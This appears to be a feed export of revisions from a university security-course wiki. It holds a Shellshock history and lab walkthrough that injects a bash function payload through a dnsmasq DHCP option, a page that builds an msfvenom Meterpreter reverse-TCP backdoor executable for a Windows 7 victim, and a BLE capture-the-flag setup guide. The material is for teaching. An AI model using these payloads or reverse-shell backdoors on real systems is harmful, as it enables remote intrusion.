After successfully installing dnsmasq we have to configure it. We can do that in the &#039;&#039;/etc/dnsmasq.conf&#039;&#039;. I changed the following lines:&lt;br /&gt;
 port=0  &lt;br /&gt;
 interface=ens33&lt;br /&gt;
 dhcp-range=192.168.123.10,192.168.123.250,12h&lt;br /&gt;
 dhcp-option-force=100,() { :; }; echo pwned&lt;br /&gt;
&lt;br /&gt;
Now we need to restart the service and check if any errors occured.&lt;br /&gt;
 service dnsmasq restart&lt;br /&gt;
 service dnsmasq status&lt;br /&gt;
&lt;br /&gt;
=== Configurating Client &amp;amp; Server IPs ===&lt;br /&gt;
==== Server ====&lt;br /&gt;
&lt;br /&gt;
We have to give the server machine a static ip address. I did it with netplan. If it isn&#039;t already installed you can install it with&lt;br /&gt;
 apt-get install netplan&lt;br /&gt;
&lt;br /&gt;
Now we have to edit the file &#039;&#039;/etc/netplan/01-network.yaml&#039;&#039;. My netplan looks as follows:&lt;br /&gt;
&lt;br /&gt;
 network:&lt;br /&gt;
   version: 2&lt;br /&gt;
   renderer: networkd&lt;br /&gt;
   ethernets:&lt;br /&gt;
     ens33:&lt;br /&gt;
       addresses:&lt;br /&gt;
         - 192.168.123.1/24&lt;br /&gt;
&lt;br /&gt;
After saving the file we need to apply the netplan we can do that with the command&lt;br /&gt;
 sudo netplan apply&lt;br /&gt;
&lt;br /&gt;
To check if the network interface got configured we can perform the command&lt;br /&gt;
 ifconfig&lt;br /&gt;
&lt;br /&gt;
==== Client ====&lt;br /&gt;
For the client side we need to configure that it requests an ip-address from the server. We can do that by editing the &#039;&#039;/etc/network/interfaces&#039;&#039; file as follows:&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet dhcp&lt;br /&gt;
&lt;br /&gt;
=== Perform the attack ===&lt;br /&gt;
When the client requests an ip address, it executes the payload defined in the dnsmasq config. We can manually request a new ip by performing the following command:&lt;br /&gt;
 sudo /etc/init.d/networking restart&lt;br /&gt;
&lt;br /&gt;
As we can see the payload gets executed. For further exploitation you can change the payload in the dnsmasq config.&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[Ausgewählte Kapitel der IT-Security]] (2021/2022)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://security.stackexchange.com/questions/68877/shellshock-dhcp-exploitation&lt;br /&gt;
* https://dwheeler.com/essays/shellshock.html&lt;br /&gt;
* https://ftp.gnu.org/gnu/bash/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Shellshock&amp;diff=8693</id>
		<title>Shellshock</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Shellshock&amp;diff=8693"/>
		<updated>2021-12-20T17:22:29Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added the References&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about the Shellshock bug found in 2014.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Seed Ubuntu 12.04, Ubuntu 20.04&lt;br /&gt;
* Packages: dnsmasq&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== History ==&lt;br /&gt;
&lt;br /&gt;
=== Initial Discovery ===&lt;br /&gt;
&lt;br /&gt;
On August the 5th, 1989 a bug was accidentally introduced into the development version of bash by the then-lead developer Brian Fox. A bug that was later released within the version 1.03 of bash and existed 25 years with presumable nobody noticing. On the 24th of September 2014 an exploit which was later named Shellshock was publicly disclosed  and assigned the CVE identifier CVE-2014-6271, CVE-2014-6277 and CVE-2014-6278. The exploit was originally found by Stéphane Chazelas on the 12th of September 2014, an french software developer that contributes to the UNIX and Free Software/OpenSource community in his spare time. He originally called the exploit Bashdoor but this name did not catch on. He reported the bug to the lead developer of bash Chet Ramey, which developed a fix for it, which was rolled out by major distributors such as Debian, Red Hat and Ubuntu as part of an coordinated disclosure.&lt;br /&gt;
&lt;br /&gt;
=== Discovery of a bigger problem ===&lt;br /&gt;
&lt;br /&gt;
After fixing the initial bug, security researchers noticed that the bash shell was still parsing every environment variable that began with the sequence &amp;quot;() \{&amp;quot;. As long as the bash would parse untrusted data, it could lead to a security exploit. The focus of the researches and developers shifted their attention towards the bash parser, although they never thought that the bash parser was security-relevant. On September the 24th, 2014 a security researcher named Tavis Ormandy reported and published an example of a bug in the bash parser, that could be exploited. Because of the failed fix of the previous exploits a new CVE identifier was assigned namely CVE-2014-7169. Just one day after this, a new exploit was found by Florian Weimer, it was assigned the identifier CVE-2014-7186 and it described a Denial of Service exploit which could be executed with the use of the initial Shellshock exploit.&lt;br /&gt;
&lt;br /&gt;
=== Aftermath ===&lt;br /&gt;
&lt;br /&gt;
The impact of this exploit was enormous, basically most Unix-like systems use the bash shell, not only Linux also some distributions of BSD, Apple MacOS X and Cygwin. A big problem was that the first patch didn&#039;t fix the exploit in its entirety, the vulnerability and proof of concept of the exploit was known to the public.&lt;br /&gt;
&lt;br /&gt;
== Functionality ==&lt;br /&gt;
&lt;br /&gt;
The  Shellshock  vulnerability  is  enumerated  as  an  improper  neutralization  of  specialelements used in an OS Command (’OS Command Injection’) by the National Instituteof  Standards  and  Technology.   It  can  be  exploited  to  give  an  attacker  remote  codeexecution.  The vulnerability occurs when defining a environment variable.  So basicallyevery system where an attacker could control the content of an environment variablewas exploitable.  This included many CGI web applications that were invoked via bash,sshd using ForceCommand and DHCP clients connecting to subverted DHCP servers.&lt;br /&gt;
&lt;br /&gt;
With  the  export  command,  it  is  possible  to  export  shell  variables  but  also  shellfunctions.  In the bash version with the Shellshock vulnerability a function definitionstarted  with  ”(){”  in  the  value  of  the  exported  variable.   The  vulnerability  existedbecause  bash  does  not  stop  processing  after  the  function  definition,  it  continues  toparse and execute shell commands.Environment variables can be defined with the following command:&lt;br /&gt;
 env variablename=&#039;&amp;lt;value&amp;gt;&#039;&lt;br /&gt;
Now to exploit this vulnerability (CVE-2014-6271) in the initial bash version the following command could be used:&lt;br /&gt;
 env x=&#039;() {.;}; &amp;lt;exploit code&amp;gt;&#039;&lt;br /&gt;
&lt;br /&gt;
== Practical Shellshock DHCP Example ==&lt;br /&gt;
&lt;br /&gt;
=== Setup ===&lt;br /&gt;
I used VMware Workstation Pro, but you might aswell use the virtualisation tool of your choice. I downloaded a SEED Ubuntu12.04 VM (32-bit) from [https://seedsecuritylabs.org/lab_env.html this website] and the latest version of Ubuntu from [https://ubuntu.com/download/desktop the official website], if you have a lack of memory just use the server version.&lt;br /&gt;
For demonstration purposes I used two client machines, but you only need one SEED machine for the example to work. Both client machines and the server are configured to be in a virtual network. This can be done in your virtualisation tool.&lt;br /&gt;
&lt;br /&gt;
=== Check Vulnerablity ===&lt;br /&gt;
After successfully setting up the machines, we now check if the clients are vulnerable to Shellshock. To check for the Shellshock vulnerability you can use the following command:&lt;br /&gt;
 env x=&#039;() { :;}; echo shellshocked&#039; bash -c &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
=== Install &amp;amp; Configurating DNSMASQ ===&lt;br /&gt;
First we have to install the package dnsmasq:&lt;br /&gt;
 apt-get install dnsmasq&lt;br /&gt;
&lt;br /&gt;
After successfully installing dnsmasq we have to configure it. We can do that in the &#039;&#039;/etc/dnsmasq.conf&#039;&#039;. I changed the following lines:&lt;br /&gt;
 port=0  &lt;br /&gt;
 interface=ens33&lt;br /&gt;
 dhcp-range=192.168.123.10,192.168.123.250,12h&lt;br /&gt;
 dhcp-option-force=100,() { :; }; echo pwned&lt;br /&gt;
&lt;br /&gt;
Now we need to restart the service and check if any errors occured.&lt;br /&gt;
 service dnsmasq restart&lt;br /&gt;
 service dnsmasq status&lt;br /&gt;
&lt;br /&gt;
=== Configurating Client &amp;amp; Server IPs ===&lt;br /&gt;
==== Server ====&lt;br /&gt;
&lt;br /&gt;
We have to give the server machine a static ip address. I did it with netplan. If it isn&#039;t already installed you can install it with&lt;br /&gt;
 apt-get install netplan&lt;br /&gt;
&lt;br /&gt;
Now we have to edit the file &#039;&#039;/etc/netplan/01-network.yaml&#039;&#039;. My netplan looks as follows:&lt;br /&gt;
&lt;br /&gt;
 network:&lt;br /&gt;
   version: 2&lt;br /&gt;
   renderer: networkd&lt;br /&gt;
   ethernets:&lt;br /&gt;
     ens33:&lt;br /&gt;
       addresses:&lt;br /&gt;
         - 192.168.123.1/24&lt;br /&gt;
&lt;br /&gt;
After saving the file we need to apply the netplan we can do that with the command&lt;br /&gt;
 sudo netplan apply&lt;br /&gt;
&lt;br /&gt;
To check if the network interface got configured we can perform the command&lt;br /&gt;
 ifconfig&lt;br /&gt;
&lt;br /&gt;
==== Client ====&lt;br /&gt;
For the client side we need to configure that it requests an ip-address from the server. We can do that by editing the &#039;&#039;/etc/network/interfaces&#039;&#039; file as follows:&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet dhcp&lt;br /&gt;
&lt;br /&gt;
=== Perform the attack ===&lt;br /&gt;
When the client requests an ip address, it executes the payload defined in the dnsmasq config. We can manually request a new ip by performing the following command:&lt;br /&gt;
 sudo /etc/init.d/networking restart&lt;br /&gt;
&lt;br /&gt;
As we can see the payload gets executed. For further exploitation you can change the payload in the dnsmasq config.&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[Ausgewählte Kapitel der IT-Security]] (2021/2022)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://security.stackexchange.com/questions/68877/shellshock-dhcp-exploitation&lt;br /&gt;
* https://dwheeler.com/essays/shellshock.html&lt;br /&gt;
* https://ftp.gnu.org/gnu/bash/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Shellshock&amp;diff=8261</id>
		<title>Shellshock</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Shellshock&amp;diff=8261"/>
		<updated>2021-12-17T14:24:23Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Create the page Shellshock. Added the chapters history, Functionality and Practical Shellshock DHCP Example&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about the Shellshock bug found in 2014.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Seed Ubuntu 12.04, Ubuntu 20.04&lt;br /&gt;
* Packages: dnsmasq&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== History ==&lt;br /&gt;
&lt;br /&gt;
=== Initial Discovery ===&lt;br /&gt;
&lt;br /&gt;
On August the 5th, 1989 a bug was accidentally introduced into the development version of bash by the then-lead developer Brian Fox. A bug that was later released within the version 1.03 of bash and existed 25 years with presumable nobody noticing. On the 24th of September 2014 an exploit which was later named Shellshock was publicly disclosed  and assigned the CVE identifier CVE-2014-6271, CVE-2014-6277 and CVE-2014-6278. The exploit was originally found by Stéphane Chazelas on the 12th of September 2014, an french software developer that contributes to the UNIX and Free Software/OpenSource community in his spare time. He originally called the exploit Bashdoor but this name did not catch on. He reported the bug to the lead developer of bash Chet Ramey, which developed a fix for it, which was rolled out by major distributors such as Debian, Red Hat and Ubuntu as part of an coordinated disclosure.&lt;br /&gt;
&lt;br /&gt;
=== Discovery of a bigger problem ===&lt;br /&gt;
&lt;br /&gt;
After fixing the initial bug, security researchers noticed that the bash shell was still parsing every environment variable that began with the sequence &amp;quot;() \{&amp;quot;. As long as the bash would parse untrusted data, it could lead to a security exploit. The focus of the researches and developers shifted their attention towards the bash parser, although they never thought that the bash parser was security-relevant. On September the 24th, 2014 a security researcher named Tavis Ormandy reported and published an example of a bug in the bash parser, that could be exploited. Because of the failed fix of the previous exploits a new CVE identifier was assigned namely CVE-2014-7169. Just one day after this, a new exploit was found by Florian Weimer, it was assigned the identifier CVE-2014-7186 and it described a Denial of Service exploit which could be executed with the use of the initial Shellshock exploit.&lt;br /&gt;
&lt;br /&gt;
=== Aftermath ===&lt;br /&gt;
&lt;br /&gt;
The impact of this exploit was enormous, basically most Unix-like systems use the bash shell, not only Linux also some distributions of BSD, Apple MacOS X and Cygwin. A big problem was that the first patch didn&#039;t fix the exploit in its entirety, the vulnerability and proof of concept of the exploit was known to the public.&lt;br /&gt;
&lt;br /&gt;
== Functionality ==&lt;br /&gt;
&lt;br /&gt;
The  Shellshock  vulnerability  is  enumerated  as  an  improper  neutralization  of  specialelements used in an OS Command (’OS Command Injection’) by the National Instituteof  Standards  and  Technology.   It  can  be  exploited  to  give  an  attacker  remote  codeexecution.  The vulnerability occurs when defining a environment variable.  So basicallyevery system where an attacker could control the content of an environment variablewas exploitable.  This included many CGI web applications that were invoked via bash,sshd using ForceCommand and DHCP clients connecting to subverted DHCP servers.&lt;br /&gt;
&lt;br /&gt;
With  the  export  command,  it  is  possible  to  export  shell  variables  but  also  shellfunctions.  In the bash version with the Shellshock vulnerability a function definitionstarted  with  ”(){”  in  the  value  of  the  exported  variable.   The  vulnerability  existedbecause  bash  does  not  stop  processing  after  the  function  definition,  it  continues  toparse and execute shell commands.Environment variables can be defined with the following command:&lt;br /&gt;
 env variablename=&#039;&amp;lt;value&amp;gt;&#039;&lt;br /&gt;
Now to exploit this vulnerability (CVE-2014-6271) in the initial bash version the following command could be used:&lt;br /&gt;
 env x=&#039;() {.;}; &amp;lt;exploit code&amp;gt;&#039;&lt;br /&gt;
&lt;br /&gt;
== Practical Shellshock DHCP Example ==&lt;br /&gt;
&lt;br /&gt;
=== Setup ===&lt;br /&gt;
I used VMware Workstation Pro, but you might aswell use the virtualisation tool of your choice. I downloaded a SEED Ubuntu12.04 VM (32-bit) from [https://seedsecuritylabs.org/lab_env.html this website] and the latest version of Ubuntu from [https://ubuntu.com/download/desktop the official website], if you have a lack of memory just use the server version.&lt;br /&gt;
For demonstration purposes I used two client machines, but you only need one SEED machine for the example to work. Both client machines and the server are configured to be in a virtual network. This can be done in your virtualisation tool.&lt;br /&gt;
&lt;br /&gt;
=== Check Vulnerablity ===&lt;br /&gt;
After successfully setting up the machines, we now check if the clients are vulnerable to Shellshock. To check for the Shellshock vulnerability you can use the following command:&lt;br /&gt;
 env x=&#039;() { :;}; echo shellshocked&#039; bash -c &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
=== Install &amp;amp; Configurating DNSMASQ ===&lt;br /&gt;
First we have to install the package dnsmasq:&lt;br /&gt;
 apt-get install dnsmasq&lt;br /&gt;
&lt;br /&gt;
After successfully installing dnsmasq we have to configure it. We can do that in the &#039;&#039;/etc/dnsmasq.conf&#039;&#039;. I changed the following lines:&lt;br /&gt;
 port=0  &lt;br /&gt;
 interface=ens33&lt;br /&gt;
 dhcp-range=192.168.123.10,192.168.123.250,12h&lt;br /&gt;
 dhcp-option-force=100,() { :; }; echo pwned&lt;br /&gt;
&lt;br /&gt;
Now we need to restart the service and check if any errors occured.&lt;br /&gt;
 service dnsmasq restart&lt;br /&gt;
 service dnsmasq status&lt;br /&gt;
&lt;br /&gt;
=== Configurating Client &amp;amp; Server IPs ===&lt;br /&gt;
==== Server ====&lt;br /&gt;
&lt;br /&gt;
We have to give the server machine a static ip address. I did it with netplan. If it isn&#039;t already installed you can install it with&lt;br /&gt;
 apt-get install netplan&lt;br /&gt;
&lt;br /&gt;
Now we have to edit the file &#039;&#039;/etc/netplan/01-network.yaml&#039;&#039;. My netplan looks as follows:&lt;br /&gt;
&lt;br /&gt;
 network:&lt;br /&gt;
   version: 2&lt;br /&gt;
   renderer: networkd&lt;br /&gt;
   ethernets:&lt;br /&gt;
     ens33:&lt;br /&gt;
       addresses:&lt;br /&gt;
         - 192.168.123.1/24&lt;br /&gt;
&lt;br /&gt;
After saving the file we need to apply the netplan we can do that with the command&lt;br /&gt;
 sudo netplan apply&lt;br /&gt;
&lt;br /&gt;
To check if the network interface got configured we can perform the command&lt;br /&gt;
 ifconfig&lt;br /&gt;
&lt;br /&gt;
==== Client ====&lt;br /&gt;
For the client side we need to configure that it requests an ip-address from the server. We can do that by editing the &#039;&#039;/etc/network/interfaces&#039;&#039; file as follows:&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet dhcp&lt;br /&gt;
&lt;br /&gt;
=== Perform the attack ===&lt;br /&gt;
When the client requests an ip address, it executes the payload defined in the dnsmasq config. We can manually request a new ip by performing the following command:&lt;br /&gt;
 sudo /etc/init.d/networking restart&lt;br /&gt;
&lt;br /&gt;
As we can see the payload gets executed. For further exploitation you can change the payload in the dnsmasq config.&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[Ausgewählte Kapitel der IT-Security]] (2021/2022)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=PandwaRF&amp;diff=8229</id>
		<title>PandwaRF</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=PandwaRF&amp;diff=8229"/>
		<updated>2021-12-16T18:44:35Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Undo revision 8227 by SVrdoljak (talk)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary ==&lt;br /&gt;
This documentation describes how operating system backdoors can be created using the MSFvenom framework and what the attacker can do once he/she gains access to the victim machine. This particular attack takes advantage of the fact that the Windows 7 firewall by design only inspects the incoming traffic while the outgoing traffic is pretty much ignored. With this in mind one can create a reverse TCP payload, open a particular port and let the victim connect to that open port. &lt;br /&gt;
== Introduction ==&lt;br /&gt;
MSFvenom is an easily manageable framework that can be used to quickly create Metasploit payloads.&lt;br /&gt;
== Requirements ==&lt;br /&gt;
Devices: 2 devices --&amp;gt; 1 running Kali Linux (attacker) and 1 running Windows 7 (victim)&lt;br /&gt;
&lt;br /&gt;
== Exploit ==&lt;br /&gt;
1. On Kali Linux we will open up a new shell and create a reverse TCP payload with the help of MSFvenom in one single line:&lt;br /&gt;
&#039;&#039;&#039;msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.134 LPORT=6565 -f exe -o backdoor.exe.&#039;&#039;&#039;&lt;br /&gt;
With &#039;&#039;&#039;-p&#039;&#039;&#039; we specify which type of payload we want to create, &#039;&#039;&#039;LHOST&#039;&#039;&#039; and &#039;&#039;&#039;LPORT&#039;&#039;&#039; are basically the IP address and the port that we will open for our victim to connect to. &#039;&#039;&#039;-f exe&#039;&#039;&#039; specifies that the created payload is an executable file and &#039;&#039;&#039;-o&#039;&#039;&#039; specifies the name under which the file should be saved.&lt;br /&gt;
&lt;br /&gt;
2. The next step is the hardest challenge and that would be to transfer the backdoor to the victim machine. This can be done in many ways (most often it is done by different social engineering toolkits) but for the sake of simplicity, you can use a USB.&lt;br /&gt;
&lt;br /&gt;
3. Before executing the backdoor file on the victim machine, we need to setup a listener that will listen for connections on a particular port. We will use metasploit to create the listener just like on the photo.&lt;br /&gt;
[[File:1.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
https://blog.attify.com/hack-iot-devices-embedded-exploitation/&lt;br /&gt;
&lt;br /&gt;
https://blog.attify.com/hack-iot-device/&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=BLE_CTF&amp;diff=7807</id>
		<title>BLE CTF</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=BLE_CTF&amp;diff=7807"/>
		<updated>2021-07-18T13:51:48Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Updated the documentation&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This tutorial explains how to setup an ESP-32 device for solving 20 flag based BLE challenges.&lt;br /&gt;
Check out the CTF and the description of the flags: [https://github.com/hackgnar/ble_ctf]&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating systems: Ubuntu 18.04 bionic amd64, Kali&lt;br /&gt;
* On Kali you&#039;ll have to install the bluetooth package:&lt;br /&gt;
 apt-get install bluetooth&lt;br /&gt;
&lt;br /&gt;
* You might have to start the bluetooth service:&lt;br /&gt;
 service bluetooth start&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1  - Standard Setup of Toolchain for Linux ===&lt;br /&gt;
&lt;br /&gt;
Install prerequisites:&lt;br /&gt;
&lt;br /&gt;
 sudo apt-get install git wget flex bison gperf python3 python3-pip python3-setuptools cmake ninja-build ccache libffi-dev libssl-dev dfu-util libusb-1.0-0&lt;br /&gt;
&lt;br /&gt;
Download [https://dl.espressif.com/dl/xtensa-esp32-elf-linux64-1.22.0-80-g6c4433a-5.2.0.tar.gz ESP32 toolchain for Linux] and extract it in ~/esp directory:&lt;br /&gt;
&lt;br /&gt;
 mkdir -p ~/esp&lt;br /&gt;
 cd ~/esp&lt;br /&gt;
 tar -xzf ~/Downloads/xtensa-esp32-elf-linux64-1.22.0-80-g6c4433a-5.2.0.tar.gz&lt;br /&gt;
&lt;br /&gt;
Update your PATH environment variable in ~/.profile to use the toolchain. To do this, add the following line to your ~/.profile file:&lt;br /&gt;
&lt;br /&gt;
 export PATH=&amp;quot;$HOME/esp/xtensa-esp32-elf/bin:$PATH&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On UBUNTU: log off and log back in to make the changes effective. &lt;br /&gt;
On KALI do not log off.&lt;br /&gt;
&lt;br /&gt;
Run the following command to verify if PATH is correctly set:&lt;br /&gt;
&lt;br /&gt;
 printenv PATH&lt;br /&gt;
&lt;br /&gt;
The output in Ubuntu should contain (userName gets replaced by your user name):&lt;br /&gt;
&lt;br /&gt;
 /home/userName/esp/xtensa-esp32-elf/bin&lt;br /&gt;
&lt;br /&gt;
=== Step 2 - Install ESP-IDF ===&lt;br /&gt;
&lt;br /&gt;
Go to ~/esp and clone the repository:&lt;br /&gt;
&lt;br /&gt;
 cd ~/esp&lt;br /&gt;
 git clone --recursive https://github.com/espressif/esp-idf.git&lt;br /&gt;
&lt;br /&gt;
Set the IDF_PATH environment variable. To do this, add the following line to ~/.profile:&lt;br /&gt;
&lt;br /&gt;
 export IDF_PATH=~/esp/esp-idf&lt;br /&gt;
&lt;br /&gt;
Log off and log back in to make the changes effective.&lt;br /&gt;
&lt;br /&gt;
Verify if the variable has been set correctly:&lt;br /&gt;
&lt;br /&gt;
 printenv IDF_PATH&lt;br /&gt;
&lt;br /&gt;
The output should display the previously entered path (replace userName with your user name):&lt;br /&gt;
&lt;br /&gt;
 /home/userName/esp/esp-idf&lt;br /&gt;
&lt;br /&gt;
=== Step 3 - Install Python packages ===&lt;br /&gt;
&lt;br /&gt;
Run:&lt;br /&gt;
&lt;br /&gt;
 python3 -m pip install -r $IDF_PATH/requirements.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
KALI --&amp;gt; if you get an error on Kali you have to configure the Makefile by adding:&lt;br /&gt;
&lt;br /&gt;
 ESP_IDF = ~/esp/esp-idf&lt;br /&gt;
&lt;br /&gt;
=== Step 4 - Connect the device ===&lt;br /&gt;
&lt;br /&gt;
Make sure your device is unplugged, then run:&lt;br /&gt;
&lt;br /&gt;
 ls /dev/tty*&lt;br /&gt;
&lt;br /&gt;
Plug your device into the host computer and run again:&lt;br /&gt;
&lt;br /&gt;
 ls /dev/tty*&lt;br /&gt;
&lt;br /&gt;
The port that appears the second time is the one needed.&lt;br /&gt;
&lt;br /&gt;
=== Step 5 - CTF Setup ===&lt;br /&gt;
&lt;br /&gt;
Unplug your device.&lt;br /&gt;
&lt;br /&gt;
Change into your ~/esp directory and execute the following commands:&lt;br /&gt;
&lt;br /&gt;
 cd ~/esp&lt;br /&gt;
 git clone https://github.com/hackgnar/ble_ctf.git&lt;br /&gt;
 cd ble_ctf&lt;br /&gt;
 make menuconfig&lt;br /&gt;
&lt;br /&gt;
Make sure to turn Bluetooth in the &amp;quot;Component config&amp;quot; on.&lt;br /&gt;
&lt;br /&gt;
If you receive a error while the make command, please rerun make menuconfig. Go to Compiler options ---&amp;gt; Turn on the &amp;quot;Disable new warnings introduced in GCC 6 - 8&amp;quot; option.&lt;br /&gt;
&lt;br /&gt;
KALI --&amp;gt; if you get an error on Kali you have to configure the Makefile by adding:&lt;br /&gt;
&lt;br /&gt;
 ESP_IDF = ~/esp/esp-idf&lt;br /&gt;
&lt;br /&gt;
A window appears. Navigate to &amp;quot;Serial flasher config&amp;quot; &amp;gt; &amp;quot;Default Serial port&amp;quot; and enter the port you found out in step 4. Confirm, save and exit.&lt;br /&gt;
&lt;br /&gt;
 make&lt;br /&gt;
&lt;br /&gt;
Plug your device into your host computer.&lt;br /&gt;
&lt;br /&gt;
 make flash&lt;br /&gt;
&lt;br /&gt;
Press the RST button on your device.&lt;br /&gt;
&lt;br /&gt;
=== Step 6 - First Interaction with ESP-32 via BLE ===&lt;br /&gt;
&lt;br /&gt;
Discover the MAC address of your device:&lt;br /&gt;
&lt;br /&gt;
 sudo hcitool lescan&lt;br /&gt;
&lt;br /&gt;
The device with the description &amp;quot;BLECTF&amp;quot; is your device.&lt;br /&gt;
&lt;br /&gt;
Display current score (replace the x&#039;s with the MAC address discovered before):&lt;br /&gt;
&lt;br /&gt;
 gatttool -b xx:xx:xx:xx:xx:xx --char-read -a 0x002a|awk -F&#039;:&#039; &#039;{print $2}&#039;|tr -d &#039; &#039;|xxd -r -p;printf &#039;\n&#039; &lt;br /&gt;
&lt;br /&gt;
The terminal should display:&lt;br /&gt;
&lt;br /&gt;
 Score: 0/20&lt;br /&gt;
&lt;br /&gt;
=== Step 7 - Upload your first flag ===&lt;br /&gt;
&lt;br /&gt;
Run (replace the x&#039;s with your MAC address):&lt;br /&gt;
&lt;br /&gt;
 gatttool -b xx:xx:xx:xx:xx:xx --char-write-req -a 0x002c -n $(echo -n &amp;quot;12345678901234567890&amp;quot;|xxd -ps)&lt;br /&gt;
&lt;br /&gt;
Display the score (replace the x&#039;s with your MAC address):&lt;br /&gt;
&lt;br /&gt;
 gatttool -b xx:xx:xx:xx:xx:xx --char-read -a 0x002a|awk -F&#039;:&#039; &#039;{print $2}&#039;|tr -d &#039; &#039;|xxd -r -p;printf &#039;\n&#039; &lt;br /&gt;
&lt;br /&gt;
The output should now display:&lt;br /&gt;
&lt;br /&gt;
 Score:1 /20&lt;br /&gt;
&lt;br /&gt;
Congratulations!! You successfully setup your ESP-32 and successfully uploaded the first flag! :)&lt;br /&gt;
&lt;br /&gt;
=== Important Commands for the BLE CTF ===&lt;br /&gt;
&lt;br /&gt;
Start the BLE CTF: https://github.com/hackgnar/ble_ctf&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;hciconfig&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
 sudo hciconfig -a&lt;br /&gt;
...lists all hci interfaces&lt;br /&gt;
&lt;br /&gt;
    sudo hciconfig hciX down&lt;br /&gt;
    sudo hciconfig hciX up&lt;br /&gt;
You might need this on receiving I/O errors.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;hcitool&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
 sudo hcitool lescan&lt;br /&gt;
...lists all availble BLE devices.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;gatttool&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
 sudo gatttool -i hci0 -b XX:XX:XX:XX:XX:XX --characteristics &lt;br /&gt;
...lists all characteristics/handles of the GATT server&lt;br /&gt;
&lt;br /&gt;
 sudo gatttool -b XX:XX:XX:XX:XX:XX --char-read -a 0x0011 &lt;br /&gt;
...reading the characteristic/handle value from handle 0x0011&lt;br /&gt;
&lt;br /&gt;
 sudo gatttool -b XX:XX:XX:XX:XX:XX --char-write -a 0x0011 -n 0x1122&lt;br /&gt;
...writes the value 0x1122 to characteristic/handle 0x0011&lt;br /&gt;
&lt;br /&gt;
 gatttool -b XX:XX:XX:XX:XX:XX --char-read -a 0x0011 --listen&lt;br /&gt;
...streams data while subscription / listening&lt;br /&gt;
&lt;br /&gt;
 gatttool -b XX:XX:XX:XX:XX:XX -I&lt;br /&gt;
...for persistent connections to a GATT server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Speed-up&#039;&#039;&#039;&lt;br /&gt;
Shell script for retrieving the current score:&lt;br /&gt;
&lt;br /&gt;
 $ cat &amp;lt;&amp;lt;EOF &amp;gt; score.sh&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
 gatttool -b xx:xx:xx:xx:xx:xx --char-read -a 0x002a | awk -F&#039;:&#039; &#039;{print \$2}&#039; | tr -d &#039; &#039; | xxd -p; printf &#039;\n&#039;&lt;br /&gt;
 EOF&lt;br /&gt;
 $ chmod u+x score.sh&lt;br /&gt;
 $ ./score.sh&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
